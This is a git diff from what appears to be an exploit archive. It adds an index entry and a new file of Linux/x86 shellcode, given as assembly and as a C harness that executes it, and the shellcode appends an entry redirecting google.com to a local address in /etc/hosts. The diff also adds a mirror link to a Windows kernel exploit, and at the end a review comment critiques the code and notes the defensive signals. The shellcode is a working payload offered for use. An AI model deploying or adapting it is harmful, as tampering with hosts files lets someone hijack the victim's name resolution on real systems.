diff --git a/files.csv b/files.csv
index 497694870..cd728932c 100755
--- a/files.csv
+++ b/files.csv
@@ -31318,6 +31318,7 @@ id,file,description,date,author,platform,type,port
 34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
 34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0
+34778,platforms/lin_x86/shellcode/34778.c,"Linux/x86 Add map in /etc/hosts file",2014-09-25,"Javier Tejedor",lin_x86,shellcode,0
 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
 34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0
diff --git a/platforms/lin_x86/shellcode/34778.c b/platforms/lin_x86/shellcode/34778.c
new file mode 100755
index 000000000..c13e9c561
--- /dev/null
+++ b/platforms/lin_x86/shellcode/34778.c
@@ -0,0 +1,63 @@
+/**
+
+;modify_hosts.asm
+;this program add a new entry in hosts file pointing google.com to 127.1.1.1
+;author Javier Tejedor
+;date 24/09/2014
+
+global _start
+
+section .text
+
+_start:
+ xor ecx, ecx
+ mul ecx
+ mov al, 0x5
+ push ecx
+ push 0x7374736f ;/etc///hosts
+ push 0x682f2f2f
+ push 0x6374652f
+ mov ebx, esp
+ mov cx, 0x401 ;permmisions
+ int 0x80 ;syscall to open file
+
+ xchg eax, ebx
+ push 0x4
+ pop eax
+ jmp short _load_data ;jmp-call-pop technique to load the map
+
+_write:
+ pop ecx
+ push 20 ;length of the string, dont forget to modify if changes the map
+ pop edx
+ int 0x80 ;syscall to write in the file
+
+ push 0x6
+ pop eax
+ int 0x80 ;syscall to close the file
+
+ push 0x1
+ pop eax
+ int 0x80 ;syscall to exit
+
+_load_data:
+ call _write
+ google db "127.1.1.1 google.com"
+**/
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc9\xf7\xe1\xb0\x05\x51\x68\x6f\x73\x74\x73\x68\x2f\x2f\x2f\x68\x68\x2f\x65\x74\x63\x89\xe3\x66\xb9\x01\x04\xcd\x80\x93\x6a\x04\x58\xeb\x10\x59\x6a\x14\x5a\xcd\x80\x6a\x06\x58\xcd\x80\x6a\x01\x58\xcd\x80\xe8\xeb\xff\xff\xff\x31\x32\x37\x2e\x31\x2e\x31\x2e\x31\x20\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt
index 95b1863a9..8cde03598 100755
--- a/platforms/windows/local/11199.txt
+++ b/platforms/windows/local/11199.txt
@@ -1,3 +1,5 @@
+Exploit-DB Mirror: http://www.exploit-db.com/sploits/KiTrap0D.zip
+
 Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
 -------------------------------------------------------------------------
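Review bot: The C harness at the end of platforms/lin_x86/shellcode/34778.c passes `strlen(code)` (a `size_t`) to `%d` and hands an `unsigned char[]` to `strlen`, both type mismatches, and `main()` relies on implicit `int`; I would write `int main(void)` and `printf("Shellcode Length: %zu\n", strlen((const char *)code));`. The two `#include` lines show no header name in this view, presumably `<stdio.h>` and `<string.h>` lost in rendering, which should be confirmed against the file. In the assembly comment, `mov cx, 0x401` is annotated as permissions, but for the `open` syscall that register carries the flags (0x401 reads as O_WRONLY|O_APPEND on Linux/x86), so the comment should read `;open flags: O_WRONLY|O_APPEND`. For anyone cataloguing this entry defensively, the observable effect is an append to /etc/hosts, which needs write access to that file and is visible to file-integrity monitoring on it.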